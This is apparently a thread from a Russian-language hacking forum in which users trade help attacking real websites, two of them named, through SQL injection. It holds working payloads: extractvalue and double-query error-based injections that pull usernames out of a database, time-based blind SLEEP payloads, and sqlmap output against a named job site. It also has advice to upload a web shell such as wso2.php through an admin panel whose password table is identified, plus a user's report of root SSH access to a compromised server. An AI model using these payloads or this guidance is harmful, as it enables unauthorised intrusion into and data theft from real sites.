нашел blind sql, но при проверки привилегий показывает USAGE, можно только дамп или есть еще варианты?
Вектор объединения значений для extractvalue: https://rdot.org/forum/showthread.php?t=2860 Code: extractvalue(1, concat(0x3A, mid((X), Y, 31))) X = SELECT convert(max(binary reverse(insert(0x3A, 1, 0, reverse(concat(schema_name, 0x0A))))), char(1000000)) FROM information_schema.schemata Где Y = 1 + I * 31, i = 0, 1, ... Но советую вам взять запрос из той темы, через него вы сразу получите и имена всех баз, и имена всех таблиц, и имена всех колонок. Скули нет. Второй столбец в таблице business_logs является первичным ключем. Он обязан содержать уникальное значение. Так как туда заносятся текущая дата и время, этого не происходит. Вы же выполняете более чем 1 запрос в секунду? Интересно, как сайт вообще работал.
варианты есть. если там java, то на wso2.php ему будет плевать. нужно идентифицировать сервер и в зависимости от этого подбирать шелл. есть статья на оваспе, посмотрите, что делать а таких случаях.
То есть PHP: SELECT * FROM ru_video WHERE dateQ №1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-20,20' at line 1 можно смело бросать всё. там параметр принимает число, если утереть или поставить букву вот таоке происходит
хелп. сканер нашёл blind sql. Что делать с url такого типа? если менять значения sleep, то ответ изменяется в соответствии со значениями. sleep(6)=6 сек. Code: _ttp://megakeys.ru/news/if(now()=sysdate(),sleep(6),0)/*'XOR(if(now()=sysdate(),sleep(6),0))OR'"XOR(if(now()=sysdate(),sleep(6),0))OR"*/ куда копать в таком случае?
Нашел на сайте уязвимость в итоге нашел root доступ (подключился по ssh) искал файлы сайта так и не нашел Как узнать путь? Доп. Информация: http://pastebin.com/ppPSZ4FH P.S>Ошибок не выводит на сайте
Перепробывал различные пути (почти все) с прикрепленной темы тут на форуме (Default *log, *conf files locations), так же на rdot'e смотрел, а может быть такое что с локалки тянуться файлы?
Кручу error-based руками Такой запрос возвращает данные из колонки username Code: site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1 Можно вывести сразу id, username ?
Code: http://24rabota.kz/searchr.php?srrazdel=302&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC Code: Parameter: srrazdel (GET) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: srrazdel=302 AND (SELECT * FROM (SELECT(SLEEP(5)))CqyI)-- uaIw&srpodrazdel=305&srcountry=27&srregion=28&srcitys1=31&srprofecy=qwe&agemin=&agemax=&srzp=&srzanatost=%CF%EE%EB%ED%E0%FF&srgrafic=%CF%EE%EB%ED%FB%E9%A0%E4%E5%ED%FC&srgender=%CC%F3%E6%F1%EA%EE%E9&srcomment=zxc&per=30&maxThread=10&submit=%C8%F1%EA%E0%F2%FC Только дамп или что-то еще можно сделать? При проверке прав отобразилось только USAGE
Выводит: Operand should contain 1 column(s) Code: site.ru/add.php?site=' and (select 1,2 from(select count(*),concat((select id,0x3a,username from users limit 0,1),floor(rand(0)*2))x from users group by x)a) and '1'='1
зайдите в админку, и пробуйте шелл залить. пароль в таблице adminip, колонка pass. аджминка по адресу admin.php
